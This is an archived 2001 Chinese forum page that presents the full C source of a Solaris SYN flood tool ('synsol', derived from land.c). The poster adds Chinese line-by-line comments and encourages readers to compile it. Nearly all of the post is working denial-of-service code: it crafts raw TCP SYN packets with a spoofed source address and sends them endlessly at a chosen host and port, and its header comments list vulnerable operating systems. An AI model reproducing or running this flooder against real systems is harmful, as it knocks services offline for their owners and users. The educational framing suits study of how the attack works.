📄 356.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="357.htm">下一篇</a>]
<hr><p align="left"><small> <br>
一个SYN攻击的代码分析 <br>
http://jjgirl.yeah.net (2001-04-19 13:32:03) <br>
这是一个SYN攻击的源程序: <br>
大家试着读一读,看是否能读懂,不懂可以给我留言。 <br>
我加的有中文注释。 <br>
/* Syn Attack against a port for Solaris */ <br>
/* Original land attack, land.c by m3lt, FLC */ <br>
/* Ported to 44BSD by blast and jerm */ <br>
/* Ported to Solaris by ziro antagonist */ <br>
/* Referenced flood.c by unknown author */ <br>
/* Converted into a syn attack against one port by CRG */ <br>
/* Please use this for educational purposes only */ <br>
/* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */ <br>
/* Additional notes: */ <br>
/* Successfully compiled on Solaris 2.51 and 2.6 */ <br>
/* Runs: synsol */ <br>
/* */ <br>
/* Tested it on: Solaris 2.6 */ <br>
/* */ <br>
/* Attacked against: */ <br>
/* Linux 2.0.33 - vulnerable */ <br>
/* Linux 2.0.30 - vulnerable */ <br>
/* Linux 1.2.13 - vulnerable */ <br>
/* Solaris 2.4 - vulnerable */ <br>
/* Solaris 2.5.1 - vulnerable */ <br>
/* SunOS 4.1.3_U3 - vulnerable */ <br>
/* Solaris 2.6 - not vulnerable */ <br>
/* */ <br>
/* Most of these test machines are not patched because they */ <br>
/* are in test lab. I tested the program against port 23 and */ <br>
<br>
/* every once in awhile I did get through. */ <br>
/* */ <br>
/* Direct any comments, questions, improvements to */ <br>
/* packetstorm@genocide2600.com */ <br>
/* http://www.genocide2600.com/~tattooman/ */ <br>
/* Your emails will be forwarded to the author, who wishes */ <br>
/* to remain known only as CRG (no email addy or URL) */ <br>
/*jjgirl:上面的注释的不用说了!*/ <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
#include <br>
/*jjgirl:上面是头文件!*/ <br>
<br>
unsigned long srcport; <br>
<br>
struct pseudohdr <br>
{ <br>
struct in_addr saddr; <br>
struct in_addr daddr; <br>
u_char zero; <br>
u_char protocol; <br>
u_short length; <br>
struct tcphdr tcpheader; <br>
}; <br>
/*jjgirl:定义一个伪装地址的结构!*/ <br>
<br>
u_short checksum(u_short * data,u_short length) <br>
{ <br>
int nleft = length; <br>
int sum=0; <br>
unsigned short *w = data; <br>
unsigned short value = 0; <br>
<br>
while (nleft > 1) { <br>
sum += *w++; <br>
nleft -= 2; <br>
} <br>
<br>
if (nleft == 1) { <br>
*(unsigned char *) (&value) = *(unsigned char *) w; <br>
sum += value; <br>
} <br>
sum = (sum >>16) + (sum & 0xffff); <br>
sum += (sum >> 16); <br>
value = ~sum; <br>
return(value); <br>
} <br>
/*jjgirl:上面校验文件!包头是需要校验的,CRC校验!*/ <br>
<br>
<br>
int main(int argc,char * * argv) <br>
{/*jjgirl:主程序开始了!*/ <br>
struct sockaddr_in sin; <br>
struct sockaddr_in din; <br>
struct hostent * hoste; <br>
struct hostent * host1; <br>
int j,sock,foo, flooddot=1; <br>
char buffer[40]; <br>
struct ip * ipheader=(struct ip *) buffer; <br>
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip) <br>
); <br>
struct pseudohdr pseudoheader; <br>
/*jjgirl:上面定义变量!*/ <br>
<br>
fprintf(stderr,"Syn attack against one port.(Infinite)\n"); <br>
<br>
<br>
if(argc<4) <br>
{ <br>
fprintf(stderr,"usage: %s \n",argv[0]); <br>
return(-1); <br>
} <br>
/*jjgirl:上面是判断参数!*/ <br>
fprintf(stderr,"%s:%s is being syn'd attacked by %s.\n",argv[1],argv[2 <br>
],argv[3]); <br>
bzero(&sin,sizeof(struct sockaddr_in)); /*write sizeof to &sin*/ <br>
sin.sin_family=AF_INET; <br>
if((host1=gethostbyname(argv[3]))!=NULL) <br>
bcopy(host1->h_addr,&din.sin_addr,host1->h_length); <br>
else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1) <br>
{ <br>
fprintf(stderr,"unknown source host %s\n",argv[3]); <br>
return(-1); <br>
} <br>
if((hoste=gethostbyname(argv[1]))!=NULL) <br>
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); <br>
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) <br>
{ <br>
fprintf(stderr,"unknown destination host %s\n",argv[1]); <br>
return(-1); <br>
} <br>
<br>
if((sin.sin_port=htons(atoi(argv[2])))==0) <br>
{ <br>
fprintf(stderr,"unknown port %s\n",argv[2]); <br>
return(-1); <br>
} <br>
/*jjgirl:上面是给sockaddr_in结构赋值,需要指明协议,端口号!*/ <br>
<br>
<br>
<br>
if((sock=socket(AF_INET,SOCK_RAW,255))==-1) <br>
{ <br>
fprintf(stderr,"couldn't allocate raw socket\n"); <br>
return(-1); <br>
} <br>
/*jjgirl:上面开始Socket了!*/ <br>
<br>
foo=1; <br>
if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1) <br>
{ <br>
{ <br>
fprintf(stderr,"couldn't set raw header on socket\n"); <br>
return(-1); <br>
} <br>
/*jjgirl:上面是为了重构报头!*/ <br>
<br>
for(j=1;j>0;j++) <br>
{ <br>
bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr)); <br>
ipheader->ip_v=4; <br>
ipheader->ip_tos=0; <br>
ipheader->ip_hl=sizeof(struct ip)/4; <br>
ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr); <br>
ipheader->ip_id=htons(random()); <br>
ipheader->ip_ttl=30; /*255;*/ <br>
ipheader->ip_p=IPPROTO_TCP; <br>
ipheader->ip_sum=0; <br>
ipheader->ip_src=din.sin_addr; <br>
ipheader->ip_dst=sin.sin_addr; <br>
<br>
tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/ <br>
tcpheader->th_dport=sin.sin_port; <br>
tcpheader->th_seq=htonl(0x28374839); <br>
tcpheader->th_flags=TH_SYN; <br>
tcpheader->th_off=sizeof(struct tcphdr)/4; <br>
tcpheader->th_win=htons(2048); <br>
tcpheader->th_sum=0; <br>
<br>
bzero(&pseudoheader,12+sizeof(struct tcphdr)); <br>
pseudoheader.saddr.s_addr=din.sin_addr.s_addr; <br>
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; <br>
pseudoheader.protocol=6; <br>
pseudoheader.length=htons(sizeof(struct tcphdr)); <br>
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct <br>
tcphdr)); <br>
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcp <br>
hdr)); <br>
/*jjgirl:上面是重构报头!*/ <br>
<br>
srcport= (10000.0*random()/(15000+1.0)); <br>
/*jjgirl:端口当然要变!*/ <br>
<br>
if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct s <br>
ockaddr *) &sin,sizeof(struct sockaddr_in))==-1) <br>
/*jjgirl:攻击开始!*/ <br>
{ <br>
fprintf(stderr,"couldn't send packet,%d\n",errno); <br>
return(-1); <br>
} <br>
usleep(2); <br>
if (!(flooddot = (flooddot+1)%(1))) <br>
{fprintf(stdout,".");fflush(stdout);} <br>
<br>
/*jjgirl:显示次数! Jjgirl 把上面一句,改为如下两句,增加显示效果,随你的便! <br>
<br>
{fprintf(stdout,".%4d",j);fflush(stdout);} <br>
int k=j; if((k%10)==0) printf("\n"); */ <br>
<br>
} /*The end of the infinite loop*/ <br>
close(sock); <br>
return(0); <br>
} <br>
/*jjgirl:结束!编译试试吧!如果有看不懂可以给我留言,或来信jjgirl@263.net,或复 <br>
习前面的课程!*/ <br>
/*jjgirl:若有人引用本文,请事先通知,并请保持完整性!*/ <br>
---------------------------------------------------------------------------- <br>
---- <br>
相关文章 关键词 <br>
樊强制作 欢迎分享 2001 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="357.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -